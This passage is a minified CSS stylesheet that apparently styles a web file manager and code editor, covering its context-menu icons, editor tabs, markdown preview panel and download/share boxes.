.font-icon{display:inline-block;width:16px;text-align:center;font-size:1.2em;color:#aaa;margin-right:15px;vertical-align:middle;margin-top:-2px;padding:0;}.context-menu-list .context-menu-item.disabled,.context-menu-list .context-menu-item.disable{cursor:not-allowed;pointer-events:auto;color:#ccc;}.context-menu-list .context-menu-item.disabled .font-icon,.context-menu-list .context-menu-item.disable .font-icon{color:#ddd;}.context-menu-list .context-menu-item.disabled.hover,.context-menu-list .context-menu-item.disable.hover{color:#ccc;cursor:default;background-color:#fff;}.context-menu-list .context-menu-item.disabled.hover .font-icon,.context-menu-list .context-menu-item.disable.hover .font-icon{color:#ddd;}.context-menu-list .context-menu-item.hover{cursor:pointer;color:#fff;background:#63acff;background-color:none \9;}.context-menu-list .context-menu-item.hover .font-icon{color:#fff;color:#aaa \9;}.context-menu-list .context-menu-item span i{float:right;text-align:right;font-style:normal;color:#888;}.context-menu-list .context-menu-item.context-menu-separator{height:2px;line-height:0;border-bottom:1px solid #eee;margin:2px 0 4px;}.context-menu-list .context-menu-item > .context-menu-list{display:none;right:-5px;top:5px;}.context-menu-list .context-menu-item.hover > .context-menu-list{display:block;}.context-menu-list .context-menu-item.hover > .context-menu-list .font-icon{color:#aaa;}.context-menu-list .context-menu-item.hover > .context-menu-list .hover .font-icon{color:#fff;color:#aaa \9;}.context-menu-list .context-menu-item .context-menu-accesskey{text-decoration:underline;}.context-menu-list .context-menu-item .line-top{border-top:1px solid #ddd !important;}.font-icon.icon-home,.x-tree-self{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -496px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;filter:none;-ms-filter:none;}.font-icon.icon-home:before,.x-tree-self:before{content:"" !important;}.font-icon.icon-circle-arrow-up{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -496px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;}.font-icon.icon-circle-arrow-up:before{content:"" !important;}.x-tree-fav.small{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -773px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;}.x-tree-fav.small:before{content:"" !important;}.frame-right #search .font-icon.icon-search{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -736px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;margin-top:4px;}.frame-right #search .font-icon.icon-search:before{content:"" !important;}.context-menu-list .font-icon:before{color:#249dff;background-image:-webkit-linear-gradient(2deg,#249dff,#08558a);background-clip:text;text-fill-color:transparent;-webkit-text-fill-color:transparent;-webkit-background-clip:text;}.context-menu-list .context-menu-item.disabled .font-icon,.context-menu-list .context-menu-item.disable .font-icon{opacity:0.3;filter:alpha(opacity=30);}.context-menu-list .context-menu-item.search .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 0px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.search .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.open .font-icon,.context-menu-list .context-menu-item.open-the-path .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -16px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.open .font-icon:before,.context-menu-list .context-menu-item.open-the-path .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.upload .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -48px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.upload .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.down .font-icon,.context-menu-list .context-menu-item.download .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -48px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.down .font-icon:before,.context-menu-list .context-menu-item.download .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.cute .font-icon,.context-menu-list .context-menu-item.cute-to .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -80px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.cute .font-icon:before,.context-menu-list .context-menu-item.cute-to .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.copy .font-icon,.context-menu-list .context-menu-item.copy-to .font-icon,.context-menu-list .context-menu-item.copy-see .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -96px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.copy .font-icon:before,.context-menu-list .context-menu-item.copy-to .font-icon:before,.context-menu-list .context-menu-item.copy-see .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.newfolder .icon-folder-close-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -16px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.newfolder .icon-folder-close-alt:before{content:"" !important;}.context-menu-list .context-menu-item.newfile .icon-expand-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.newfile .icon-expand-alt:before{content:"" !important;}.context-menu-list .context-menu-item.rname .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -64px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.rname .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.past .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -64px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.past .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.remove .font-icon,.context-menu-list .context-menu-item.fav-remove .font-icon,.context-menu-list .context-menu-item .close .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -80px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.remove .font-icon:before,.context-menu-list .context-menu-item.fav-remove .font-icon:before,.context-menu-list .context-menu-item .close .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.zip .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.zip .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.unzip .icon-folder-open-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.unzip .icon-folder-open-alt:before{content:"" !important;}.context-menu-list .context-menu-item.share .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-15px -703px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.share .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.open-text .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:1px -702px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.open-text .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.setBackground .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -609px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.setBackground .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.fav .font-icon,.context-menu-list .context-menu-item.fav-page .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -773px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.fav .font-icon:before,.context-menu-list .context-menu-item.fav-page .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.set-file-icon-size .font-icon.icon-picture,.context-menu-list .context-menu-item.setting-wall .font-icon.icon-picture{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0px -577px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.set-file-icon-size .font-icon.icon-picture:before,.context-menu-list .context-menu-item.setting-wall .font-icon.icon-picture:before{content:"" !important;}.context-menu-list .context-menu-item.sort-by .font-icon.icon-sort{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -528px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.sort-by .font-icon.icon-sort:before{content:"" !important;}.context-menu-list .context-menu-item.list-icon .font-icon.icon-eye-open{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:1px -625px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.list-icon .font-icon.icon-eye-open:before{content:"" !important;}.context-menu-list .context-menu-item .font-icon.icon-code-fork{display:inline-block;background-image:url("../../../images/file_icon/icon_app/history.png");width:16px !important;background-repeat:no-repeat;background-size:100% 100%;}.context-menu-list .context-menu-item .font-icon.icon-code-fork:before{content:"" !important;}.context-menu-list .context-menu-item .font-icon.icon-info{color:#fff !important;background:#c4e5ff;text-align:center;width:15px;border-radius:50%;height:15px;line-height:15px;margin-right:15px;box-shadow:0 0 0 1px #6db9f5;}.frame-main{top:40px;overflow:auto;bottom:40px;width:100%;position:absolute;}.bindary-box{width:300px;margin:0 auto;padding-bottom:40px;border:1px solid #ddd;border:1px solid rgba(0,0,0,0.2);background:#fff;box-shadow:0 1px 5px rgba(0,0,0,0.4);margin-top:5%;border-radius:4px;}.bindary-box .title{width:100%;height:150px;padding-top:20px;border-radius:5px 4px 0 0;background:#6699cc url("../../../images/common/login.png") -110px 0px;}.bindary-box .ico{width:140px;height:140px;border-radius:100px;overflow:hidden;margin:0 auto;background:rgba(255,255,255,0.4);text-align:center;}.bindary-box .ico img{width:80%;padding-top:15px;}.content-info{text-align:center;}.content-info .name{padding:30px;padding-bottom:2px;font-size:22px;word-wrap:break-word;word-break:break-all;}.content-info .size{color:#888;}.content-info .size i{font-style:normal;color:#aaa;padding-left:10px;}.content-info .btn-group{margin-top:25px;}.content-info .btn-download{width:115px;}.content-info .dropdown-toggle{height:20px;}.content-info .error-tips{padding-top:15px;color:#bbb;}.title-box{height:36px;width:800px;border-bottom:1px solid #ddd;margin:0 auto;margin-top:10px;}.title-box .name{font-size:20px;float:left;}.title-box .size{float:left;line-height:30px;padding-left:10px;}.title-box .size .share-time{padding-left:10px;font-style:normal;color:#aaa;}.title-box .btn-group{float:right;}.title-box .btn-group .btn-download{padding:4px 20px;}.title-box .btn-group .dropdown-toggle{height:16px;height:30px \9;}.content-box,.content-box.markdown-preview{width:900px;margin:30px auto;margin-bottom:30px;}.show-image{text-align:center;}.show-image img{max-width:100%;}.show-pdf{width:100%;margin:0px;background:#ccc;position:absolute;top:0px;bottom:0px;}.show-code{border:1px solid #ddd;box-shadow:0 2px 5px rgba(0,0,0,0.2);width:80%;position:absolute;bottom:0px;left:10%;top:0px;}.show-code .code{padding:0px;margin:0;height:100%;}.show-code .ace_editor{font-size:1em;font-family:Consolas, source-code-pro, Monaco, Menlo, 'Ubuntu Mono', Consolas, monospace, '';}.show-iframe{margin:0;width:100%;height:100%;position:absolute;top:0;bottom:0;left:0;right:0;}.show-flash{width:80%;margin:0 auto;padding-top:30px;height:90%;}html,body{overflow:hidden;overflow-x:hidden;overflow-y:hidden;}.edit-main{color:#444;font-size:1em;width:100%;}.edit-main .edit-tab .tabs .edit-changed a.close{opacity:1.0;filter:alpha(opacity=100);color:#63acff;}.edit-main .edit-tab .tabs .edit-changed .icon-remove:before{content:"\f06a";}.edit-main .edit-tab .tabs .edit-changed a:hover.icon-remove:before{content:"\f057";}.context-menu-list{z-index:1000 !important;box-shadow:0 0px 10px rgba(0,0,0,0.15);border:1px solid #dfdfdf;border-radius:2px;max-height:500px;-webkit-animation-name:inherit;-webkit-animation-duration:inherit;-webkit-animation-timing-function:inherit;-webkit-animation-iteration-count:inherit;}.context-menu-list.code-font-list,.context-menu-list.code-theme-list{overflow-y:auto;overflow-x:hidden;}.context-menu-list.code-font-list .context-menu-item,.context-menu-list.code-theme-list .context-menu-item{padding:0px 10px 0 10px;}.context-menu-list.code-theme-list{width:180px !important;}.context-menu-list.code-charset-list{height:250px;overflow:auto;}.context-menu-list.code-charset-list .context-menu-item{padding:0 10px 0 0px;}.context-menu-list .gotoline-input input{padding:4px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;margin-left:15px;height:16px;}.context-menu-list .gotoline-input input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.context-menu-list .code-charset-list .context-menu-item.selected .font-icon{margin-right:5px;margin-left:10px;}.code-mode-list{position:absolute;z-index:99;top:auto;right:300px;bottom:30px;overflow:auto;display:block;width:180px;height:250px;padding:35px 0 10px 0;}.code-mode-list li{padding:2px 2em;font-size:13px;cursor:pointer;line-height:20px;}.code-mode-list li.list-input{position:fixed;background:#eee;-webkit-transform:translateZ(0);height:30px;width:160px;bottom:292px;padding:4px 0 0 20px;}.code-mode-list li.list-input input{width:110px;padding:4px 10px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;}.code-mode-list li.list-input input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.code-mode-list li.hover{background:#eee;background:#63acff;color:#fff;}.code-mode-list li.selected,.code-mode-list li.selected.hover{background:#63acff;color:#fff;}.edit-tab .tabs{height:29px;width:100%;background:#fff;overflow:hidden;border-bottom:1px solid #ddd;}.edit-tab .tabs .tab{position:relative;height:30px;line-height:30px;color:#666;width:120px;float:left;background:#f6f6f6;border-right:1px solid #ddd;}.edit-tab .tabs .tab .name{margin-left:5px;display:block;width:80%;text-align:center;overflow:hidden;white-space:nowrap;position:absolute;z-index:2;cursor:default;height:28px;}.edit-tab .tabs .tab .name img{height:17px;padding-bottom:4px;padding-right:3px;}.edit-tab .tabs .tab .close{float:right;color:#aaa;position:relative;opacity:0.1;filter:alpha(opacity=10);font-size:1.25em;margin-right:3px;z-index:3;margin-top:6px;-webkit-transition:opacity 0.1s;-moz-transition:opacity 0.1s;-o-transition:opacity 0.1s;-ms-transition:opacity 0.1s;transition:opacity 0.1s;width:18px;height:18px;text-align:center;line-height:18px;}.edit-tab .tabs .tab .close:hover{opacity:0.9;filter:alpha(opacity=90);}.edit-tab .tabs .tab .close:active{opacity:1.0;filter:alpha(opacity=100);}.edit-tab .tabs .tab.hover{background:#eee;background:linear-gradient(to right,#fff,#ccc);}.edit-tab .tabs .tab.hover .close{opacity:0.6;filter:alpha(opacity=60);}.edit-tab .tabs .tab.this{z-index:20;color:#23B2EC;color:#fff;background:#63acff;background:linear-gradient(to right,#44abf6,#2865e2);}.edit-tab .tabs .tab.this .close{opacity:0.1;filter:alpha(opacity=10);color:#eee;}.edit-tab .tabs .tab.this .close:hover{opacity:0.9;filter:alpha(opacity=90);}.edit-tab .tabs .tab.this .close:active{opacity:1.0;filter:alpha(opacity=100);color:#fff;}.edit-tab .tabs .tab.this.hover .close{opacity:0.6;filter:alpha(opacity=60);}.edit-tab .tabs .tab.loading .close{opacity:1.0;filter:alpha(opacity=100);color:#666;border-radius:20px;-webkit-animation:moveCircleLoop 1.4s infinite linear;animation:moveCircleLoop 1.4s infinite linear;}.edit-tab .tabs .tab.loading .close:before{content:"\f110";}.edit-tab .tabs .tab.loading.this .close{color:#ffffff;}.edit-tab .tabs .tab.loading.hover .close{opacity:1.0;filter:alpha(opacity=100);}.edit-tab .tabs .add{float:left;color:#666;line-height:25px;height:30px;border:1px solid #ddd;border-bottom:none;border-radius:3px 3px 0 0;font-size:8px;margin-top:2px;padding:0px 10px;background:#eee;margin-left:3px;}.edit-tab .tabs .add:hover{background:#ddd;}.edit-tab .tabs .add:active{background:#888;color:#ccc;}.draggable-dragging{position:absolute;z-index:99999;color:#fff;height:30px;line-height:30px;opacity:0.6;filter:alpha(opacity=60);width:120px;float:left;cursor:-webkit-grab;background:#63acff;background:linear-gradient(to right,#44abf6,#2865e2);}.draggable-dragging .name{margin-left:5px;display:block;width:80%;text-align:center;overflow:hidden;white-space:nowrap;position:absolute;z-index:2;cursor:default;height:28px;}.draggable-dragging .name img{height:17px;padding-bottom:4px;padding-right:3px;}.draggable-dragging .close{display:none;}.edit-body{width:100%;background:#fff;position:absolute;bottom:0;top:59px;z-index:50;}.edit-body .tabs{width:100%;height:100%;position:absolute;top:0px;bottom:0;}.edit-body .tabs .edit-content{display:none;padding:0;margin:0;height:100%;width:100%;}.edit-body .tabs .edit-content.this{display:block;padding:0;}.edit-body .tabs .tab{padding:10px;display:none;}.edit-body .bottom-toolbar{width:auto;height:25px;z-index:25;position:absolute;bottom:5px;right:0;margin-right:20px;border-radius:4px;opacity:0.8;filter:alpha(opacity=80);background:#fff;border:1px solid #f3f3f3;}.edit-body .bottom-toolbar a{float:left;padding:0 10px;line-height:25px;text-decoration:none;color:#000;}.edit-body .bottom-toolbar a:hover{color:#63acff;}.edit-body .bottom-toolbar a.select{background:#63acff;color:#fff;border-radius:1px;}.edit-body .bottom-toolbar a .font-icon{color:#333;}.introduction{font-size:1em;position:fixed;width:100%;top:64px;left:0;bottom:0;overflow:auto;background:#FFF;}.introduction .intro-left{width:40%;float:left;}.introduction .tips{padding:5px;margin-bottom:0;color:#888;}.introduction .tips p{padding-left:2em;word-break:break-all;line-height:1.2em;}.introduction .tips p:before{content:"\f006";font-family:FontAwesome;padding-right:8px;}.introduction .tips h1{font-size:25px;font-weight:400;border-bottom:1px dashed #ddd;padding:4px 0 10px 5px;margin:5px 0 10px 10px;}.introduction .tips h1 span{border-bottom:3px solid #ddd;padding:8px;color:#666;}.introduction pre{margin-left:15px;padding:5px;color:#56A238;line-height:1.5em;background:#fff;border-bottom:1px solid #eee;}.introduction .intro-right{width:60%;float:left;}.introduction .blue{color:#8BB7D5;}.introduction .blue h1 span{border-color:#8BB7D5;color:#8BB7D5;}.introduction .orange{color:#F27642;}.introduction .orange h1 span{color:#F27642;border-color:#F27642;}.introduction .green{color:#56A238;border-left:1px solid #ddd;}.introduction .green h1 span{color:#56A238;border-color:#56A238;}div.tools{height:28px;z-index:999;border-bottom:1px solid #ddd;overflow:hidden;background:#f8f8f8 url("../../../images/common/bg.gif") 0 0px;min-width:560px;-webkit-box-shadow:1px 2px 15px #eee;-moz-box-shadow:1px 2px 15px #eee;box-shadow:1px 2px 15px #eee;}div.tools .disable-mask{width:100%;height:33px;margin-left:-10px;background:#fff;position:absolute;opacity:0.4;filter:alpha(opacity=40);z-index:10;margin-top:-4px;}div.tools .left{float:left;margin:0 0 0 5px;}div.tools .right{float:right;margin:0 5px 0 0;}div.tools a{font-size:1.25em;font-weight:800;float:left;color:#555;font-weight:400;text-decoration:none;padding:0px 9px;line-height:29px;height:29px;}div.tools a .font-icon{font-size:14px;color:#888;}div.tools a .icon-caret-down{padding-left:5px;font-size:1em;color:ccc;}div.tools a:hover{background:#eee;}div.tools a.select,div.tools a.select:hover,div.tools a:active{background:#63acff;color:#fff;}div.tools a.select i.font-icon,div.tools a.select:hover i.font-icon,div.tools a:active i.font-icon{color:#fff;}div.tools .right .btn{padding:1px 7px;margin-right:-1px;height:20px;background:#eee;margin-top:2px;float:right;line-height:20px;}div.tools .line{border-left:1px solid #ccc;margin:5px 4px;float:left;height:16px;}ul.dropbox{color:#666;font-size:1em;position:absolute;top:27px;z-index:1000;margin:0px;}ul.dropbox li{list-style:none;padding:2px 0 2px 10px;line-height:20px;cursor:pointer;}ul.dropbox .lihover,ul.dropbox li.this{background:#63acff;color:#fff;}#fontsize{display:none;left:166px;width:100px;min-width:100px;}#codetheme{display:none;left:173px;}body div#ace_settingsmenu,body div#kbshortcutmenu{background-color:#000;opacity:0.75;filter:alpha(opacity=75);color:#FFF;box-shadow:-5px 4px 5px rgba(0,0,0,0.2);-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;}.edit-content .resize{position:absolute;background:#000;cursor:col-resize;margin-left:-5px;background-color:#f6f6f6;background-color:rgba(0,0,0,0.01);background:url("../../../images/common/resize.png") 0px 50% no-repeat;height:100%;width:10px;left:100%;z-index:100;}.edit-content .resize:hover{background-color:#eee;background-color:rgba(0,0,0,0.1);}.edit-content .resize.resize-active{background-color:#ddd;background-color:rgba(0,0,0,0.2);}.edit-content.markdown-full .ace_editor{width:100% !important;}.edit-content.markdown-full .resize{display:none;}.edit-content.markdown-full .edit-right-frame{width:0 !important;}.edit-right-frame{position:fixed;top:59px;right:0px;width:40%;bottom:0;background:#fff;border-left:1px solid #ddd;z-index:99;overflow:visible;}.edit-right-frame .mask-view{z-index:9999;opacity:0.05;filter:alpha(opacity=5);}.edit-right-frame .right-main{width:100%;height:100%;overflow:auto;}.edit-right-frame .preview-frame{position:absolute;top:0px;right:0;bottom:0;width:100%;background:#fff;}.edit-right-frame .preview-markdown-tool,.edit-right-frame .function-list-tool,.edit-right-frame .preview-url-tool{width:100%;height:25px;border-bottom:1px solid #ddd;}.edit-right-frame .preview-markdown-tool .box,.edit-right-frame .function-list-tool .box,.edit-right-frame .preview-url-tool .box{width:105px;height:25px;position:absolute;top:0px;right:0px;background:url("../../../images/common/buttons_40.png") 0 0px repeat-x;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.edit-right-frame .preview-markdown-tool .box a,.edit-right-frame .function-list-tool .box a,.edit-right-frame .preview-url-tool .box a{font-weight:800;text-decoration:none;border:1px solid rgba(200,200,200,0.01);display:inline-block;margin-top:1px;margin-left:2px;font-size:1.25em;position:relative;padding:0px 5px;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.edit-right-frame .preview-markdown-tool .box a .font-icon,.edit-right-frame .function-list-tool .box a .font-icon,.edit-right-frame .preview-url-tool .box a .font-icon{color:#999;}.edit-right-frame .preview-markdown-tool .box a:hover,.edit-right-frame .function-list-tool .box a:hover,.edit-right-frame .preview-url-tool .box a:hover{border:1px solid #ccc;box-shadow:0 0 20px rgba(0,0,0,0.2) inset;}.edit-right-frame .preview-url-frame .preview-frame-content{position:absolute;right:0px;left:0px;bottom:0px;overflow:auto;top:25px;background:#fff;}.edit-right-frame .preview-url-frame .input-content{position:absolute;height:27px;right:100px;left:0px;}.edit-right-frame .preview-url-frame .input-content input{height:23px;border:none;border-right:1px solid #ddd;width:100%;padding-right:10px;text-shadow:1px 1px 3px #CCE;outline:none;color:#888;font-size:1.15em;box-shadow:#ddd 0px 0px 30px inset;background:#f8f8f8 url("../../../images/common/bg.gif") 0px -2px repeat-x;}.edit-right-frame .preview-url-frame .input-content input:focus{box-shadow:#bbb 0px 0px 30px inset;}.edit-right-frame .preview-url-frame .box{border-left:1px solid #eee;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool{border:none;height:inherit;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .box{position:absolute;bottom:0.1px;-webkit-transform:translateZ(0);z-index:999;top:20px;right:25px;background:rgba(200,200,200,0.2);opacity:0.6;filter:alpha(opacity=60);width:35px;height:140px;border:none;border-radius:0;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .box .content{position:absolute;width:35px;top:0;left:0;height:100%;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .box:hover{opacity:0.9;filter:alpha(opacity=90);}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .box a{margin:0;padding:0;display:block;text-align:center;height:35px;border:none;line-height:35px;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .box a .font-icon{color:#444;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .box a:hover{border:none;background:#bbb;color:#000;box-shadow:none;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .box a:hover .font-icon{color:#222;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .toolbar{position:fixed;bottom:0.1px;z-index:999;-webkit-transform:translateZ(0);height:29px;margin-top:5px;background:#f8f8f8 url("../../../images/common/bg.gif") 0 0px;left:420px;width:360px;top:-6px;border-left:1px solid #ddd;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .toolbar .content{position:absolute;top:0;left:0;height:100%;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .toolbar .md-tools{width:26px;height:100%;display:inline-block;text-decoration:none;text-align:center;margin:0;line-height:30px;float:left;padding:0;color:#666;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .toolbar .md-tools:hover{background:#ccc;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .toolbar .md-tools.md-tools-split{width:10px;color:#ccc;}.edit-right-frame .preview-markdown-frame .preview-markdown-tool .toolbar .md-tools.md-tools-split:hover{background:none;}.edit-right-frame .preview-markdown-frame .markdown-preview{padding:10px 35px 100px 35px;}.edit-right-frame .preview-markdown-frame .markdown-help{width:650px;background:#fff;height:80%;box-shadow:0 5px 15px rgba(0,0,0,0.1);border-radius:4px;border-top-right-radius:0;position:absolute;top:20px;right:60px;border:1px solid #ccc;overflow:hidden;bottom:0.1px;z-index:9999;-webkit-transform:translateZ(0);}.edit-right-frame .preview-markdown-frame .markdown-help h3{padding:20px 10px 15px 20px;margin:0;border-bottom:1px solid #eee;font-size:20px;}.edit-right-frame .preview-markdown-frame .markdown-help .content{height:100%;overflow:auto;margin:10px;padding-bottom:20px;margin-right:0;}.edit-right-frame .preview-markdown-frame .markdown-help p{margin:0;}.edit-right-frame .preview-markdown-frame .markdown-help h5{font-weight:800;}.edit-right-frame .preview-markdown-frame .markdown-help pre{border-radius:4px;background:#eee;color:#777;font-family:Menlo, Consolas, source-code-pro, Monaco, 'Liberation Mono', 'Ubuntu Mono', Courier, 'Helvetica Neue', 'Microsoft Yahei', '微软雅黑', 'Lantinghei SC', STXihei, WenQuanYi, sans-serif;font-size:12px;}.edit-right-frame .preview-markdown-frame .markdown-help .col-md-4{width:35%;padding-bottom:70px;}.edit-right-frame .preview-markdown-frame .markdown-menu-box{width:300px;background:#fff;height:80%;max-height:90%;box-shadow:0 5px 15px rgba(0,0,0,0.1);border-radius:4px;border-top-right-radius:0;position:absolute;top:20px;right:60px;border:1px solid #ccc;overflow:hidden;bottom:0.1px;z-index:9999;-webkit-transform:translateZ(0);}.edit-right-frame .preview-markdown-frame .markdown-menu-box h3{padding:20px 10px 15px 20px;margin:0;border-bottom:1px solid #eee;font-size:22px;}.edit-right-frame .preview-markdown-frame .markdown-menu-box .content{height:100%;overflow:auto;}.edit-right-frame .preview-markdown-frame .markdown-menu-box .markdown-menu ul{padding:10px 10px 80px 10px;}.edit-right-frame .preview-markdown-frame .markdown-menu-box .markdown-menu li{font-size:1em;list-style:none;text-overflow:ellipsis;white-space:nowrap;line-height:1.0em;}.edit-right-frame .preview-markdown-frame .markdown-menu-box .markdown-menu li a{display:block;text-decoration:none;padding:5px 6px;}.edit-right-frame .preview-markdown-frame .markdown-menu-box .markdown-menu li a:hover{background:#def;}.edit-right-frame .preview-markdown-frame .markdown-menu-box .markdown-menu-h2{margin-left:2em;}.edit-right-frame .preview-markdown-frame .markdown-menu-box .markdown-menu-h3{margin-left:3.5em;}.edit-right-frame .preview-markdown-frame .markdown-menu-box .markdown-menu-h4{margin-left:5em;}.edit-right-frame .preview-markdown-frame .markdown-menu-box .markdown-menu-h5{margin-left:6.5em;}.edit-right-frame .preview-markdown-frame .markdown-menu-box .markdown-menu-h6{margin-left:8em;}.edit-right-frame .preview-markdown-frame .markdown-menu-box .tools-markdown-more{position:absolute;top:20px;right:10px;}.edit-right-frame .preview-markdown-frame .markdown-setting{width:160px;height:auto;background:#fff;border:1px solid #ddd;z-index:10;box-shadow:0 5px 15px rgba(0,0,0,0.1);border-radius:4px;border-top-right-radius:0;position:absolute;top:125px;right:60px;-webkit-transform:translateZ(0);}.edit-right-frame .preview-markdown-frame .markdown-setting ul{padding:0;margin:10px 0;}.edit-right-frame .preview-markdown-frame .markdown-setting ul li{width:100%;height:25px;list-style:none;overflow:hidden;}.edit-right-frame .preview-markdown-frame .markdown-setting ul li.line{height:1px;background:#ddd;margin:5px 0;}.edit-right-frame .preview-markdown-frame .markdown-setting ul a,.edit-right-frame .preview-markdown-frame .markdown-setting ul a:visited{display:block;line-height:25px;text-decoration:none;padding:0 0 0 20px;color:#444;overflow:hidden;}.edit-right-frame .preview-markdown-frame .markdown-setting ul a i{padding-right:5px;color:#888;}.edit-right-frame 